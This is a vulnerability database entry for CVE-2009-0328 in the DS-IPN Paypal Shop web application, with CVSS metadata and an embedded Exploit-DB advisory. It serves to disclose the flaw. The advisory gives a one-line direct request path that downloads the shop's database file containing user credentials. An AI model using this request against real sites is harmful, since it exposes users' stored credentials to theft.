ID CVE-2009-0328
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:33:00
Description
ROBS-PROJECTS Digital Sales IPN (aka DS-IPN.NET or DS-IPN Paypal Shop) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request for Database/Sales.mdb.
{"id": "CVE-2009-0328", "bulletinFamily": "NVD", "title": "CVE-2009-0328", "description": "ROBS-PROJECTS Digital Sales IPN (aka DS-IPN.NET or DS-IPN Paypal Shop) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request for Database/Sales.mdb.", "published": "2009-01-29T18:30:00", "modified": "2017-09-29T01:33:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0328", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/7816", "http://secunia.com/advisories/33602", "https://exchange.xforce.ibmcloud.com/vulnerabilities/48082"], "cvelist": ["CVE-2009-0328"], "type": "cve", "lastseen": "2019-05-29T18:09:57", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "262fd7e8a88de5584fe6751f49f29d32"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "881fc951284bd75f187614e6b009bcaf"}, {"key": "cpe23", "hash": "28b666368743f7cd6e5f93c8d69d2fee"}, {"key": "cvelist", "hash": "c4bfe97435f635e6d7cc00c21e669bc2"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "f30109dfdbfbf783c0b61792a6b2c20a"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "fa12e087f68642fcaefafba0d4583885"}, {"key": "description", "hash": "0a1b264d64e10363bd89d01c9e5cd49a"}, {"key": "href", "hash": "6401ae6fd0d864e4ae6fa13cd6d669f7"}, {"key": "modified", "hash": "8e68a47024ac52c01130d0c9914fccda"}, {"key": "published", "hash": "47fa9a1871f907d3e694061c6a8354e7"}, {"key": "references", "hash": "7d23af088c6b0c1a5a3ece634bf8ec0b"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "c685191f299ed93faad5ca76a3134d2a"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "747ed1b63f012397affd9fb3be3eb79230e75580158b281a74bd4426939a8e2a", "viewCount": 1, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-05-29T18:09:57"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7816"]}], "modified": "2019-05-29T18:09:57"}, "vulnersScore": 5.7}, "objectVersion": "1.3", "cpe": ["cpe:/a:robs-projects:digital_sales_ipn:_nil_"], "affectedSoftware": [{"name": "robs-projects digital_sales_ipn", "operator": "eq", "version": "_nil_"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:robs-projects:digital_sales_ipn:_nil_:*:*:*:*:*:*:*"], "cwe": ["CWE-264"]}
{"exploitdb": [{"lastseen": "2016-02-01T03:07:56", "bulletinFamily": "exploit", "description": "DS-IPN.NET Digital Sales IPN Database Disclosure Vulnerability. CVE-2009-0328. Webapps exploit for asp platform", "modified": "2009-01-18T00:00:00", "published": "2009-01-18T00:00:00", "id": "EDB-ID:7816", "href": "https://www.exploit-db.com/exploits/7816/", "type": "exploitdb", "title": "DS-IPN.NET Digital Sales IPN Database Disclosure Vulnerability", "sourceData": "###########################################################################\n#-----------------------------I AM MUSLIM !!------------------------------#\n###########################################################################\n\n==============================================================================\n _ _ _ _ _ _ \n / \\ | | | | / \\ | | | |\n / _ \\ | | | | / _ \\ | |_| |\n / ___ \\ | |___ | |___ / ___ \\ | _ |\n IN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\n \n\n==============================================================================\n [\u00c2\u00bb] We love Palestine, stop the war, too many innocent people!!\n==============================================================================\n DS-IPN Paypal Shop Remote Database Disclosure Vulnerability\n==============================================================================\n\n\t[\u00c2\u00bb] Script: [ DS-IPN Paypal Shop ]\n\t[\u00c2\u00bb] Language: [ ASP ]\n\t[\u00c2\u00bb] Website: [ http://shop.robs-projects.com/product_DS-IPN.html ]\n\t[\u00c2\u00bb] Founder: [ Moudi <m0udi@9.cn> ]\n [\u00c2\u00bb] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ]\n [\u00c2\u00bb] Team: [ EvilWay ]\n [\u00c2\u00bb] SiteWeb: [ www.evilway.org ]\n\n###########################################################################\n\n===[ Exploit ]===\t\n\t\n\t[\u00c2\u00bb] http://localhost/[path]/Database/Sales.mdb\n\n\nAuthor: Moudi\n\n###########################################################################\n\n# milw0rm.com [2009-01-18]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/7816/"}]}